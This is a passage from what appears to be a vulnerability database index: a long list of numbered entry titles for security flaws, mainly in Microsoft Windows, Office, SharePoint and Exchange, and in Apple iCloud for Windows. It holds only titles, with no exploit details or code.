XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [900] Microsoft Windows grpconv.exe memory corruption [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [884] Microsoft Windows NT 4.0 RPC Runtime Library denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [598] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC/DCOM Object Identity unknown vulnerability [597] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC over HTTP Reply denial of service [596] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS denial of service [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [331] Microsoft Windows 2000/XP RPCSS race condition [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [277] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPCSS memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [178] Microsoft Windows NT 4.0/2000/XP/Server 2003 RPC DCOM PerformScmStage memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [154] Microsoft Windows up to 2000 SP3 RPC unknown vulnerability [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service [176821] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer Service permission [176798] F5 BIG-IP APM/BIG-IP APM Clients Windows Installer cachecleaner.dll uncontrolled search path [176770] Apache HTTP Server up to 2.4.46 on Windows denial of service [176667] McAfee Data Loss Prevention on Windows ePO Administrator Extension cross site scripting [176519] Microsoft Malware Protection Engine unknown vulnerability [176516] Microsoft Malware Protection Engine denial of service [176504] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176503] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [176502] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176501] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176489] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176488] Microsoft Outlook 2013 RT SP1/2013 SP1/2016/2019 unknown vulnerability [176487] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176481] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176480] Microsoft Office 2013 RT SP1/2013 SP1/2016/2019 Graphics unknown vulnerability [176479] Microsoft Office Excel unknown vulnerability [176478] Microsoft Visual Studio Code Kubernetes Tools unknown vulnerability [176475] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [176350] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176349] Cisco WebEx Player on Windows/macOS WRF File memory corruption [176060] Backdoor.Win32.NerTe.772 Service Port 21 C:\WINDOWS\scanregs.exe improper authentication [176058] Backdoor.Win32.NerTe.772 Service Port 21 C:\WINDOWS\scanregs.exe backdoor [176028] Citrix Workspace App on Windows access control [175481] PuTTY up to 0.74 on Windows Title denial of service [174872] Microsoft Visual Studio up to 2019 Version 16.9 unknown vulnerability [174869] Microsoft Dynamics 365 for Finance and Operations unknown vulnerability [174860] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174859] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174858] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174857] Microsoft Office/Excel information disclosure [174856] Microsoft Office/Excel unknown vulnerability [174855] Microsoft Office unknown vulnerability [174854] Microsoft Office/Excel 365 Apps for Enterprise up to Online Server unknown vulnerability [174853] Microsoft Office/Excel information disclosure [174852] Microsoft Office/Excel unknown vulnerability [174851] Microsoft Office/Word Graphics unknown vulnerability [174850] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174838] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174837] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174836] Microsoft .NET/Visual Studio unknown vulnerability [174834] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174832] Microsoft Exchange Server 2013 CU23/2016 CU16/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174831] Microsoft Visual Studio Code unknown vulnerability [174830] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [174829] Microsoft Visual Studio Code unknown vulnerability [174828] Microsoft Lync Server/Skype for Business Server 2013 CU10/2015 CU11 unknown vulnerability [174827] Microsoft Lync/Skype for Business Server 2013 CU10/2015 CU11/2019 CU5 unknown vulnerability [174825] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174823] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174822] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174820] Microsoft Accessibility Insights for Web information disclosure [174540] Dell EMC Integrated System for Microsoft Azure Stack Hub up to 2011 hard-coded credentials [174247] Aviatrix VPN Client up to 2.14.13 on Windows unquoted search path [174028] Apple macOS up to 11.2.3 Windows Server permission [173303] NVIDIA Windows GPU Display Driver R390 on Windows Installer unknown vulnerability [173302] NVIDIA Windows GPU Display Driver on Windows Kernel Driver nvlddmkm.sys null pointer dereference [173301] NVIDIA Windows GPU Display Driver on Windows Kernel Mode Layer nvlddmkm.sys DxgkDdiEscape unknown vulnerability [173271] NVIDIA GPU Display Driver R450/R460 on Windows/Linux Reference denial of service [173251] NVIDIA GPU Display Driver on Windows/Linux Kernel Mode Layer nvlddmkm.sys unknown vulnerability [173176] HEUR.Backdoor.Win32.Generic Service Port 1080 C:\WINDOWS\1314.exe backdoor [172951] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [172871] Microsoft Kubernetes Tools on Visual Studio unknown vulnerability [172870] Microsoft Office 365 Apps for Enterprise up to 2019 Excel unknown vulnerability [172869] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Update denial of service [172868] Microsoft Office Excel unknown vulnerability [172867] Microsoft Outlook memory corruption [172866] Microsoft Word/Office/SharePoint unknown vulnerability [172865] Microsoft Office Excel unknown vulnerability [172863] Microsoft Visual Studio Code unknown vulnerability [172861] Microsoft Azure DevOps Server 2020.0.1 unknown vulnerability [172859] Microsoft Visual Studio Code unknown vulnerability [172858] Microsoft GitHub Pull Requests and Issues Extension on Visual Studio unknown vulnerability [172857] Microsoft Visual Studio Code Remote Development Extension unknown vulnerability [172856] Microsoft Maven for Java Extension on Visual Studio unknown vulnerability [172855] Microsoft Visual Studio Code unknown vulnerability [172854] Microsoft Visual Studio Code unknown vulnerability [172853] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172852] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172851] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172850] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172844] Microsoft Visual Studio Code unknown vulnerability [172739] Zoom Chat up to 2021-04-09 on Windows/macOS unknown vulnerability [172680] Dolby Audio X2 API on Windows unknown vulnerability [172627] Cisco Advanced Malware Protection/Immunet on Windows DLL Loader uncontrolled search path [172514] MongoDB Compass up to 1.2.x/1.24.x on Windows privileges management [171498] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171497] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171261] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171260] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171259] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure entropy [170987] Microsoft Visual Studio Code unknown vulnerability [170986] Microsoft Visual Studio Code Java Extension Pack unknown vulnerability [170985] Microsoft Visual Studio Code ESLint Extension unknown vulnerability [170982] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure [170972] Microsoft Office 365 Apps for Enterprise up to 2019 PowerPoint unknown vulnerability [170971] Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300 information disclosure [170970] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 unknown vulnerability [170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability [170968] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [170959] Microsoft Office Excel unknown vulnerability [170958] Microsoft Office Excel unknown vulnerability [170945] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.9 Git link following [170910] Microsoft Azure Spring Cloud information disclosure [170596] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170595] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170594] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170593] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170592] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170591] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170590] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170102] Cisco AnyConnect Secure Mobility Client on Windows Interprocess Communication uncontrolled search path [169953] Nagios XI 5.7.5 HTTP Request windowswmi.inc.php os command injection [169911] F5 BIG-IP APM Client Troubleshooting Utility up to 7.1.8.4/7.1.9.7/7.2.1.0 on Windows Edge Client untrusted search path [169508] Microsoft Visual Studio Code npm-script Extension unknown vulnerability [169507] Microsoft Visual Studio up to 2017 15.9/2019 16.8 unknown vulnerability [169504] Microsoft Lync Server/Skype for Business Server denial of service [169503] Microsoft Lync Server/Skype for Business Server unknown vulnerability [169496] Microsoft Teams on iOS information disclosure [169495] Microsoft SharePoint 2013 SP1/2016/2019 unknown vulnerability [169494] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169493] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169492] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 information disclosure [169491] Microsoft Office unknown vulnerability [169490] Microsoft Office unknown vulnerability [169489] Microsoft Office unknown vulnerability [169488] Microsoft Office unknown vulnerability [169486] Microsoft Exchange Server 2016 CU18/2019 CU7 unknown vulnerability [169485] Microsoft Exchange Server 2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [169481] Microsoft Azure Kubernetes Service unknown vulnerability [169478] Microsoft .NET Framework 4.6 up to 4.8 denial of service [169477] Microsoft .NET Core/Visual Studio denial of service [169178] SolarWinds Serv-U up to 15.2.1 on Windows Home Directory permission [169027] Cloudflare WARP on Windows unquoted search path [168806] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168805] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168804] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168803] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds write [168758] Google Go up to 1.14.13/1.15.6 on Windows Fetch Module command injection [168122] Backdoor.Win32.Whisper.b Service Port 113 C:\Windows\rundll32.exe stack-based overflow [167993] Apache Tomcat up to 7.0.106/8.5.59/9.0.39/10.0.0-M9 on Windows NTFS File System File.getCanonicalPath information disclosure [167778] SAP NetWeaver Master Data Management 7.10/710/750 on Windows information disclosure [167666] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.8 cross site scripting [167653] Microsoft Word unknown vulnerability [167652] Microsoft Word out-of-bounds write [167650] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167649] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167648] Microsoft SharePoint Foundation 2010 SP2 unknown vulnerability [167647] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [167646] Microsoft SharePoint Server 2016/2019 privileges management [167645] Microsoft SharePoint Server 2013 SP/2016/2019 privileges management [167644] Microsoft SQL Server 2012 SP4/2014 SP3/2016 SP2/2017 CU22/2019 CU8 sql injection [167643] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [167642] Microsoft Excel unknown vulnerability [167641] Microsoft Excel memory corruption [167627] Microsoft ASP.NET Core/Visual Studio denial of service [167473] Backdoor.Win32.Ketch.b HTTP GET Request c:\Windows\watchb.tmp buffer overflow [167427] Backdoor.Win32.NinjaSpy.c HTTP PUT C:\WINDOWS\cmd.dll buffer overflow [167318] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows OpenSSL Library permission [167312] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows permission [167311] Veritas CloudPoint on Windows Windows Agent openssl.cnf permission [161959] Apple iCloud up to 11.3 on Windows WebKit Universal cross site scripting [161744] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161743] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161742] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161297] PostgreSQL up to 12 on Windows Installer privilege escalation [160966] Microsoft SQL Server 2017/2019 Reporting Services privilege escalation [160964] Microsoft Visual Studio Code JSON privilege escalation [160953] Microsoft Visual Studio memory corruption [160952] Microsoft Office 2016/2019 on macOS information disclosure [160945] Microsoft Excel up to 2019 memory corruption [160941] Microsoft SharePoint Server 2013 SP1 cross site scripting [160938] Microsoft SharePoint Server 2019 Profile Data privilege escalation [160937] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160933] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160931] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Profile Data privilege escalation [160929] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160928] Microsoft Office Word privilege escalation [160927] Microsoft Excel up to 2019 memory corruption [160926] Microsoft Office up to 2019 Excel memory corruption [160919] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160918] Microsoft SharePoint Server Excel information disclosure [160917] Microsoft Office Word privilege escalation [160916] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [160915] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160914] Microsoft Office up to 2019 Excel memory corruption [160859] Microsoft Visual Studio privilege escalation [160857] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [160856] Microsoft SharePoint Server 2013 SP1/2016/2019 API information disclosure [160854] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation [160851] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160850] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160846] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160845] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160590] Trend Micro OfficeScan XG SP1 on Windows privilege escalation [160103] Cisco Webex Meetings Desktop App on Windows directory traversal [159979] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [159890] Apple iCloud up to 11.2 on Windows WebKit Page Loading weak authentication [159889] Apple iCloud up to 11.2 on Windows WebKit privilege escalation [159888] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159887] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159886] Apple iCloud up to 11.2 on Windows WebKit Universal cross site scripting [159885] Apple iCloud up to 11.2 on Windows WebKit CSP privilege escalation [159884] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159883] Apple iCloud up to 11.2 on Windows ImageIO Integer Coercion Error [159882] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159881] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159880] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159879] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159878] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159877] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159876] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159875] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159874] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159873] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159872] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159870] Apple iCloud up to 7.19 on Windows WebKit Page Loading weak authentication [159869] Apple iCloud up to 7.19 on Windows WebKit privilege escalation [159868] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159867] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159866] Apple iCloud up to 7.19 on Windows WebKit Universal cross site scripting [159865] Apple iCloud up to 7.19 on Windows WebKit CSP privilege escalation [159864] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159863] Apple iCloud up to 7.19 on Windows ImageIO Integer Coercion Error [159862] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159861] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159860] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159859] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159858] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159857] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159856] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159855] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159854] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159853] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159852] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159613] Microsoft SQL Server Management Studio 18.6 privilege escalation [159611] Microsoft SharePoint Enterprise Server/SharePoint Server privilege escalation [159609] Microsoft SharePoint Foundation cross site scripting [159607] Microsoft Visual Studio Code Environment Variable privilege escalation [159606] Microsoft Excel up to 2019 memory corruption [159602] Microsoft SharePoint Foundation privilege escalation [159599] Microsoft Excel up to 2019 information disclosure [159598] Microsoft Office 365 Apps for Enterprise/2013 C2R/2019 privilege escalation [159596] Microsoft Excel 2010 SP2 memory corruption [159586] Microsoft SharePoint Foundation privilege escalation [159578] Microsoft Outlook up to 2019 information disclosure [159577] Microsoft Word 365 Apps for Enterprise/2019 information disclosure [159576] Microsoft Excel memory corruption [159575] Microsoft SharePoint Foundation information disclosure [159569] Microsoft Word up to 2019 information disclosure [159565] Microsoft SharePoint Foundation Office cross site scripting [159549] Microsoft Word up to 2019 information disclosure [159547] Microsoft Excel up to 2019 memory corruption [159544] Microsoft Excel up to 2019 memory corruption [159538] Microsoft Office memory corruption [159533] Microsoft Access memory corruption [159514] Microsoft .NET Framework up to 4.8 Cache File privilege escalation [159510] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4.7.2/4.8 privilege escalation [159498] Microsoft Office/Outlook/365 Apps for Enterprise memory corruption [159000] Citrix Workspace App 1912 CU1/2006.1 on Windows Automatic Updater Service privilege escalation [157967] Microsoft Visual Studio Code ESLint Extension privilege escalation [157965] Microsoft Lync/Skype for Business Server/SharePoint OAuth Token privilege escalation [157912] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157911] Microsoft SharePoint 2013 SP1/2016/2019 Email Parser privilege escalation [157910] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157909] Microsoft SharePoint 2013 SP1/2016/2019 privilege escalation [157908] Microsoft Office/SharePoint information disclosure [157907] Microsoft SharePoint 2016/2019 cross site scripting [157906] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Office cross site scripting [157905] Microsoft Office/SharePoint Word memory corruption [157904] Microsoft Office/SharePoint Word memory corruption [157903] Microsoft Office/Project Markup File Origin Validation Error [157902] Microsoft Office Online Server/Office Web Apps cross site scripting [157899] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 PerformancePoint Services privilege escalation [157898] Microsoft Outlook up to 2019 memory corruption [157897] Microsoft Office/SharePoint Word memory corruption [157896] Microsoft Office/SharePoint information disclosure [157877] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1/2019.0.1 cross site scripting [156389] Microsoft Visual Studio Code Live Share Extension information disclosure [156338] Microsoft SharePoint Foundation cross site scripting [156337] Microsoft SharePoint Foundation cross site scripting [156336] Microsoft SharePoint Foundation privilege escalation [156335] Microsoft SharePoint Foundation cross site scripting [156334] Microsoft SharePoint Foundation Redirect [156333] Microsoft SharePoint Foundation cross site scripting [156332] Microsoft SharePoint Foundation privilege escalation [156331] Microsoft SharePoint Foundation cross site scripting [156330] Microsoft SharePoint Foundation cross site scripting [156329] Microsoft SharePoint Foundation cross site scripting [156328] Microsoft SharePoint Foundation ASP.Net Web Control privilege escalation [156327] Microsoft SharePoint Foundation 2010 SP2 cross site scripting [156326] Microsoft Project information disclosure [156325] Microsoft Office memory corruption [156324] Microsoft Office up to 2019 for Mac Outlook information disclosure [156323] Microsoft Excel up to 2019 for Mac memory corruption [156322] Microsoft Excel up to 2019 for Mac memory corruption [156299] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1 privilege escalation [156298] Microsoft Bing Search on Android weak authentication [156297] Microsoft Word on Android privilege escalation [155805] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155804] Apple iCloud up to 7.18/11.1 on Windows WebKit cross site scripting [155803] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155802] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155801] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155800] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155799] Apple iCloud up to 7.18/11.1 on Windows WebKit Universal cross site scripting [155798] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155796] Apple iCloud up to 7.18/11.1 on Windows ImageIO information disclosure [155795] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155794] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155164] Microsoft Power BI Report Server privilege escalation [155163] Microsoft Visual Studio Code Python Extension privilege escalation [155159] Microsoft Visual Studio/ASP.NET Core privilege escalation [155125] Microsoft .NET Core/.NET Framework denial of service [155124] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155123] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155122] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [155121] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155120] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155119] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [155118] Microsoft SharePoint Enterprise Server 2016/2019 cross site scripting [155098] Microsoft .NET Framework 3.0 SP2/3.5.1 privilege escalation [155083] Microsoft Excel memory corruption [155082] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 information disclosure [155081] Microsoft Visual Studio Code Python Extension privilege escalation [155070] Microsoft SharePoint Enterprise Server 2016/2019 Source Markup privilege escalation [155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption [155068] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155067] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155040] F5 BIG-IP Edge Client 7.1.5/7.1.6/7.1.7/7.1.8/7.1.9 on Windows ActiveX Component memory corruption [154622] Handy Groupware 1.7.3.1 on Windows ActiveX Control HShell.dll ShellExec privilege escalation [154327] HPE Onboard Administrator 4.95 on Linux/Windows Reflected cross site scripting [154022] Aviatrix OpenVPN Client up to 2.5.7 on Linux/macOS/Windows OpenSSL Parameter privilege escalation [153744] Intel PROSet/Wireless WiFi up to 21.69 on Windows 10 Kernel Mode Driver memory corruption [153285] Microsoft Research JavaScript Cryptography Library 1.4 ECC Incorrect Calculation [153271] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [153262] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [153254] Microsoft Office/SharePoint/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 memory corruption [153253] Microsoft Office 365 ProPlus Excel memory corruption [153252] Microsoft SharePoint Enterprise Server cross site scripting [153251] Microsoft SharePoint Enterprise Server privilege escalation [153250] Microsoft privilege escalation [153249] Microsoft SharePoint Enterprise Server privilege escalation [153248] Microsoft SharePoint Enterprise Server cross site scripting [153247] Microsoft 